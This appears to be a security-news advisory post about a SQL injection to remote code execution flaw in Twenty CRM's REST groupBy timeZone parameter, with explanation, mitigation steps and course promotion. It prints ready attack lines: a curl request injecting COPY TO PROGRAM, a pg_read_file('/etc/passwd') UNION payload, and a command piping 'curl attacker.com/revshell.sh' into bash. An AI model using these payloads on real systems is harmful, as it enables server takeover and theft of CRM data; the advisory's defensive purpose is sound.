Listen to this Post
How the mentioned CVE works
The vulnerability exists in Twenty CRM versions 1.7.7 through 1.16.7 due to unsanitized user input in the `timeZone` parameter of the REST API `groupBy` endpoint. This parameter is directly interpolated into a raw SQL expression using JavaScript template literals inside get-group-by-expression.util.ts. No parameterization, validation, or escaping occurs. An authenticated attacker can inject malicious SQL into the `timeZone` field. Because the backend uses PostgreSQL, the injected SQL can leverage the `COPY TO PROGRAM` feature. If the PostgreSQL user is a superuser (common in default or misconfigured deployments), `COPY TO PROGRAM` allows execution of arbitrary operating system commands on the database server. The attack chains SQL injection with `COPY TO PROGRAM` to achieve remote code execution. The attacker only needs any authenticated session (no admin rights required). The injected payload might look like: `’ UNION SELECT ‘id’,’name’,'”date”‘,’value’ FROM pg_read_file(‘/etc/passwd’)–` but the real RCE uses COPY (SELECT 1) TO PROGRAM 'malicious_command'. The unsanitized `timeZone` appears in a `GROUP BY` clause, allowing the attacker to break out of the intended query structure. This leads to full compromise of the database server, including data theft, backdoor installation, or lateral movement.
dailycve form:
Platform: Twenty CRM
Version: 1.7.7-1.16.7
Vulnerability: RCE via SQLi
Severity: Critical
date: 2026-05-26
Prediction: 2026-05-28
What Undercode Say:
Check if PostgreSQL user is superuser
psql -U twenty -d twenty_db -c "SELECT usesuper FROM pg_user WHERE usename = current_user;"
Simulate vulnerable timeZone injection via curl
curl -X POST https://target.com/api/rest/groupBy \
-H "Authorization: Bearer $TOKEN" \
-d '{"group_by":{"timeZone":"''; COPY (SELECT 1) TO PROGRAM ''/tmp/exploit.sh''; --"}}'
List running PostgreSQL processes for privilege confirmation
ps aux | grep postgres
Exploit:
Send a crafted `timeZone` value to `/api/rest/groupBy` endpoint: `’ UNION ALL SELECT NULL, NULL, NULL, (SELECT quote_literal(pg_read_file(‘/etc/passwd’)))–` or trigger COPY (SELECT pg_sleep(5)) TO PROGRAM 'curl attacker.com/revshell.sh | bash'. Requires authenticated user and superuser Postgres role.
Protection from this CVE:
Upgrade to Twenty CRM >1.16.7 or apply patch from GitHub. Use parameterized queries instead of template literals. Restrict PostgreSQL user to non-superuser with ALTER USER twenty_user NOSUPERUSER. Deploy WAF rules blocking SQL patterns with COPY TO PROGRAM. Audit all `timeZone` usage in GraphQL resolvers.
Impact:
Full remote code execution on database server. Attacker can read/write arbitrary files, install malware, pivot to internal network, exfiltrate all CRM data, or wipe the database. Critical impact on confidentiality, integrity, and availability.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

